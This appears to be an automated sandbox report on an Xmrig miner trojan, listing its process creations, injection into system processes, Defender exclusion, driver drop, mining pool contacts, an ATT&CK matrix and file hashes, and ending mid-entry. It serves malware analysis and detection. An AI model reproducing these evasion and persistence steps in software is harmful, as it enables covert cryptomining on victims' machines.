          Source: C:\Windows\System32\dialer.exeCode function: 25_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,25_2_0000000140001B54
          Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001E858987960 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,31_2_000001E858987960
          Source: C:\Windows\System32\dialer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Modifies power options to not sleep / hibernate
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
          Source: dialer.exe, 00000041.00000003.2138482082.000001C3772F2000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000041.00000002.3283235144.000001C3772F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
          Windows Management Instrumentation          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Disable or Modify Tools          		1
          Credential API Hooking          		1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		1
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts2
          Native API          		11
          Windows Service          		1
          Access Token Manipulation          		1
          Deobfuscate/Decode Files or Information          		LSASS Memory1
          File and Directory Discovery          		Remote Desktop Protocol1
          Credential API Hooking          		1
          Non-Application Layer Protocol          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts1
          Service Execution          		Logon Script (Windows)11
          Windows Service          		2
          Obfuscated Files or Information          		Security Account Manager24
          System Information Discovery          		SMB/Windows Admin SharesData from Network Shared Drive1
          Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook713
          Process Injection          		1
          Install Root Certificate          		NTDS441
          Security Software Discovery          		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading          		LSA Secrets2
          Process Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          File Deletion          		Cached Domain Credentials131
          Virtualization/Sandbox Evasion          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
          Rootkit          		DCSync1
          Application Window Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          Masquerading          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          Modify Registry          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron131
          Virtualization/Sandbox Evasion          		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
          Access Token Manipulation          		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
          Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task713
          Process Injection          		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
          Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
          Hidden Files and Directories          		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1587400 Sample: nW2oopMIdg.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 55 pool.supportxmr.com 2->55 57 pool-fr.supportxmr.com 2->57 69 Malicious sample detected (through community Yara rule) 2->69 71 Multi AV Scanner detection for submitted file 2->71 73 Yara detected Xmrig cryptocurrency miner 2->73 75 10 other signatures 2->75 8 nW2oopMIdg.exe 1 2 2->8         started        12 Lightshot.exe 1 2->12         started        signatures3 process4 file5 51 C:\ProgramData\Screenshots\Lightshot.exe, PE32+ 8->51 dropped 77 Uses powercfg.exe to modify the power settings 8->77 79 Modifies the context of a thread in another process (thread injection) 8->79 81 Adds a directory exclusion to Windows Defender 8->81 14 dialer.exe 1 8->14         started        17 powershell.exe 23 8->17         started        19 cmd.exe 1 8->19         started        28 13 other processes 8->28 53 C:\Windows\Temp\yycjbdwxjaoe.sys, PE32+ 12->53 dropped 83 Multi AV Scanner detection for dropped file 12->83 85 Sample is not signed and drops a device driver 12->85 87 Modifies power options to not sleep / hibernate 12->87 21 dialer.exe 12->21         started        23 dialer.exe 12->23         started        26 powershell.exe 12->26         started        30 11 other processes 12->30 signatures6 process7 dnsIp8 89 Contains functionality to inject code into remote processes 14->89 91 Writes to foreign memory regions 14->91 93 Allocates memory in foreign processes 14->93 95 Contains functionality to compare user and computer (likely to detect sandboxes) 14->95 32 lsass.exe 14->32 injected 35 winlogon.exe 14->35 injected 41 2 other processes 14->41 97 Loading BitLocker PowerShell Module 17->97 37 conhost.exe 17->37         started        43 2 other processes 19->43 99 Injects code into the Windows Explorer (explorer.exe) 21->99 101 Creates a thread in another existing process (thread injection) 21->101 103 Injects a PE file into a foreign processes 21->103 45 4 other processes 21->45 59 141.94.96.71, 49704, 80 DFNVereinzurFoerderungeinesDeutschenForschungsnetzese Germany 23->59 105 Query firmware table information (likely to detect VMs) 23->105 107 Found strings related to Crypto-Mining 23->107 109 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 23->109 39 conhost.exe 26->39         started        47 13 other processes 28->47 49 11 other processes 30->49 signatures9 process10 signatures11 61 Installs new ROOT certificates 32->61 63 Writes to foreign memory regions 32->63 65 Adds a directory exclusion to Windows Defender 37->65 67 Modifies power options to not sleep / hibernate 37->67

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          nW2oopMIdg.exe62%VirustotalBrowse
          nW2oopMIdg.exe66%ReversingLabsWin64.Trojan.MintZard

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\ProgramData\Screenshots\Lightshot.exe66%ReversingLabsWin64.Trojan.MintZard
          C:\Windows\Temp\yycjbdwxjaoe.sys5%ReversingLabs

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://3csp.icrosof4m/ocp00%Avira URL Cloudsafe
          https://172.94.1q0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          pool-fr.supportxmr.com
          		141.94.96.144
          		truefalse
            		unknown
            pool.supportxmr.com
            		unknown
            		unknownfalse
              		high

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://schemas.xmlsoap.org/ws/2005/07/securitypolicylsass.exe, 00000027.00000000.2076104919.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3283163976.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076039842.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3282908894.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalse
                		high
                http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702lsass.exe, 00000027.00000000.2076039842.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3282908894.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalse
                  		high
                  http://schemas.xmlsoap.org/ws/2005/02/trustlsass.exe, 00000027.00000000.2076039842.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3282908894.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalse
                    		high
                    http://docs.oasis-open.org/ws-sx/ws-trust/200512lsass.exe, 00000027.00000000.2076104919.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3283163976.00000140AD850000.00000004.00000001.00020000.00000000.sdmpfalse
                      		high
                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlsass.exe, 00000027.00000000.2076039842.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3282908894.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalse
                        		high
                        http://schemas.xmlsoap.org/ws/2004/09/policylsass.exe, 00000027.00000000.2076039842.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3282908894.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalse
                          		high
                          http://schemas.xmlsoap.org/wsdl/ertieslsass.exe, 00000027.00000000.2076039842.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3282908894.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalse
                            		high
                            http://schemas.xmlsoap.org/wsdl/soap12/lsass.exe, 00000027.00000002.3282908894.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalse
                              		high
                              http://3csp.icrosof4m/ocp0lsass.exe, 00000027.00000000.2076735630.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3286173867.00000140AE074000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://schemas.xmlsoap.org/wsdl/lsass.exe, 00000027.00000002.3282908894.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalse
                                		high
                                https://172.94.1qdialer.exe, 00000041.00000002.3278592017.0000000140001000.00000040.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://xmrig.com/docs/algorithmsdialer.exe, 00000041.00000002.3278592017.0000000140001000.00000040.00000001.00020000.00000000.sdmpfalse
                                  		high

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  141.94.96.71
                                  		unknownGermany
                                  		680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesetrue

                                  General Information

                                  Joe Sandbox version:42.0.0 Malachite
                                  Analysis ID:1587400
                                  Start date and time:2025-01-10 10:35:05 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 9m 48s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:62
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:8
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:nW2oopMIdg.exe
                                  renamed because original name is a hash value
                                  Original Sample Name:35a8d03f86ae6f92424d6424fe0805d338eccedff177b400182102685299022c.exe
                                  Detection:MAL
                                  Classification:mal100.spyw.evad.mine.winEXE@90/12@1/1
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:Failed
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe

                                  Warnings

                                  • Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe
                                  • Excluded IPs from analysis (whitelisted): 40.126.32.133, 40.126.32.134, 40.126.32.76, 20.190.160.17, 40.126.32.136, 20.190.160.20, 40.126.32.140, 20.190.160.22, 20.109.210.53, 13.107.253.45
                                  • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, dns.msftncsi.com, d.3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.8.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                  • Report size getting too big, too many NtCreateKey calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  04:35:53API Interceptor1x Sleep call for process: nW2oopMIdg.exe modified
                                  04:35:54API Interceptor32x Sleep call for process: powershell.exe modified
                                  04:36:31API Interceptor429883x Sleep call for process: winlogon.exe modified
                                  04:36:32API Interceptor346307x Sleep call for process: lsass.exe modified
                                  04:36:32API Interceptor1107x Sleep call for process: svchost.exe modified
                                  04:36:34API Interceptor409567x Sleep call for process: dwm.exe modified
                                  04:36:36API Interceptor1884x Sleep call for process: dialer.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  141.94.96.71SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeGet hashmaliciousXmrigBrowse
                                    xmr_linux_amd64 (2).elfGet hashmaliciousXmrigBrowse
                                      SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exeGet hashmaliciousXmrigBrowse
                                        kWYLtJ0Cn1.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                          h2UFp4aCRq.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                            http://pool.supportxmr.comGet hashmaliciousUnknownBrowse
                                              http://pool.supportxmr.comGet hashmaliciousUnknownBrowse
                                                01904399.dat.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                                  file.exeGet hashmaliciousXmrigBrowse
                                                    file.exeGet hashmaliciousXmrigBrowse

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      pool-fr.supportxmr.comchrtrome22.exeGet hashmaliciousXmrigBrowse
                                                      • 141.94.96.144
                                                      174.exeGet hashmaliciousXmrigBrowse
                                                      • 141.94.96.144
                                                      file.exeGet hashmaliciousXmrigBrowse
                                                      • 141.94.96.144
                                                      SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeGet hashmaliciousXmrigBrowse
                                                      • 141.94.96.71
                                                      file.exeGet hashmaliciousXmrigBrowse
                                                      • 141.94.96.71
                                                      egFMhHSlmf.exeGet hashmaliciousXmrigBrowse
                                                      • 141.94.96.71
                                                      xmr_linux_amd64 (2).elfGet hashmaliciousXmrigBrowse
                                                      • 141.94.96.195
                                                      xmr_linux_amd64.elfGet hashmaliciousXmrigBrowse
                                                      • 141.94.96.195
                                                      SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exeGet hashmaliciousXmrigBrowse
                                                      • 141.94.96.144

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      DFNVereinzurFoerderungeinesDeutschenForschungsnetzesearmv4l.elfGet hashmaliciousUnknownBrowse
                                                      • 195.37.28.224
                                                      armv6l.elfGet hashmaliciousUnknownBrowse
                                                      • 134.245.99.176
                                                      armv7l.elfGet hashmaliciousUnknownBrowse
                                                      • 139.19.193.179
                                                      https://www.bing.com/ck/a?!&&p=3c39a9f42e445bf68e8df296bb1fae53d0c972b7afa34ab05d6ca3737dc8872cJmltdHM9MTczNjM4MDgwMA&ptn=3&ver=2&hsh=4&fclid=2ffa23fd-270b-62aa-06ef-300e230b6c77&u=a1aHR0cHM6Ly93d3cuYmluZy5jb20vYWxpbmsvbGluaz91cmw9aHR0cHMlM2ElMmYlMmZ3d3cuYWxwaGFzdXJhbmNlLmNvbSUyZiZzb3VyY2U9c2VycC1sb2NhbCZoPUE1Z0FJY1RpY2tXbGRHJTJidFFwJTJmY0dnQ3Z3Tmg4UmZjRXBwQmdUTGlNOEtNJTNkJnA9bHdfdHAmaWc9QTlFRTIyOTNCQzJGNDgyMDlGMTkyNEFBOUQ4MTUyNkYmeXBpZD1ZTjg3M3gxNzg2NjcxMDE2NTE1NDQyOTA3NA&ntb=1Get hashmaliciousUnknownBrowse
                                                      • 141.95.100.236
                                                      https://t.co/qNQo33w8wDGet hashmaliciousHTMLPhisherBrowse
                                                      • 141.95.98.65
                                                      chrtrome22.exeGet hashmaliciousXmrigBrowse
                                                      • 141.94.96.144
                                                      http://hockey30.comGet hashmaliciousUnknownBrowse
                                                      • 141.95.171.140
                                                      https://hockey30.com/nouvelles/malaise-en-conference-de-presse-kent-hughes-envoie-un-message-cinglant-a-juraj-slafkovsky/Get hashmaliciousUnknownBrowse
                                                      • 141.95.171.140
                                                      n397UdH3b5.exeGet hashmaliciousWannacry, ContiBrowse
                                                      • 131.188.40.189

                                                      JA3 Fingerprints

                                                      No context

                                                      Dropped Files

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      C:\Windows\Temp\yycjbdwxjaoe.syschrtrome22.exeGet hashmaliciousXmrigBrowse
                                                        pTVKHqys2h.exeGet hashmaliciousXmrigBrowse
                                                          174.exeGet hashmaliciousXmrigBrowse
                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XWorm, XmrigBrowse
                                                              47SXvEQ.exeGet hashmaliciousBlank Grabber, XmrigBrowse
                                                                xmr new.exeGet hashmaliciousXmrigBrowse
                                                                  eth.exeGet hashmaliciousXmrigBrowse
                                                                    file.exeGet hashmaliciousXmrigBrowse
                                                                      hiwA7Blv7C.exeGet hashmaliciousXmrigBrowse

                                                                        Created / dropped Files

                                                                        C:\ProgramData\Screenshots\Lightshot.exe

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\nW2oopMIdg.exe
                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):2876416
                                                                        Entropy (8bit):6.537334125155787
                                                                        Encrypted:false
                                                                        SSDEEP:49152:lYul8CapE2jLY0vFhbkQbIptv1xZ4ayOIYDIGC3FYKjPgz+WWrS2sWioLyVQGMNx:lYLCGYYbkQbytvVeOIerC1zPgSWW/pio
                                                                        MD5:990A3F3B1273510F210FB9B541DA219F
                                                                        SHA1:33E536C5B4BDB6F6042F93445DFFD8A3AD488E8B
                                                                        SHA-256:35A8D03F86AE6F92424D6424FE0805D338ECCEDFF177B400182102685299022C
                                                                        SHA-512:495734313CAE980D3F48EF78422CF9484EB347833672FD5C693F8F8C92C1C0D51986795CD55A3148BE18FF0C9D36ADFF5A1C3FF18200668DD33F3978A459C246
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 66%
                                                                        Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d......g.........."..........N+.....@..........@.............................p,...........`.................................................x...<....P,.P.... ,..............`,.x...............................(.......8...............X............................text...f........................... ..`.rdata... ......."..................@..@.data....1+...... +.................@....pdata....... ,.......+.............@..@.00cfg.......0,.......+.............@..@.tls.........@,.......+.............@....rsrc...P....P,.......+.............@..@.reloc..x....`,.......+.............@..B........................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):64
                                                                        Entropy (8bit):1.1510207563435464
                                                                        Encrypted:false
                                                                        SSDEEP:3:Nlllullkv/tz:NllU+v/
                                                                        MD5:6442F277E58B3984BA5EEE0C15C0C6AD
                                                                        SHA1:5343ADC2E7F102EC8FB6A101508730898CB14F57
                                                                        SHA-256:36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
                                                                        SHA-512:F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
                                                                        Malicious:false
                                                                        Preview:@...e................................................@..........

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0z3ziakm.rl5.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e4gcpf45.vsk.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_juj05cqp.em5.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rlofs2lm.htq.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):64
                                                                        Entropy (8bit):1.1510207563435464
                                                                        Encrypted:false
                                                                        SSDEEP:3:Nlllul2lllllZ:NllUClll
                                                                        MD5:4D98AF7F487E62A9C1D44B02674BAB7E
                                                                        SHA1:1B492B2208949EB7F18C32F309C296B4258DBA65
                                                                        SHA-256:1E3ED9CE6343DA27C6759A0F05D6DD0B92B3A9C63B6492A2DA4E4F371D9F56DA
                                                                        SHA-512:60EC859B84836E865E767FE858E70ACEC6F0FB8077B2E51D6CB4095533433B791C9A16396D69279C7F896DF003A1ED6656087B43EFA16523DA4026317CBB49E6
                                                                        Malicious:false
                                                                        Preview:@...e.................................:..............@..........

                                                                        C:\Windows\Temp\__PSScriptPolicyTest_asxfxva3.cte.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Windows\Temp\__PSScriptPolicyTest_bzsopdsf.pqc.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
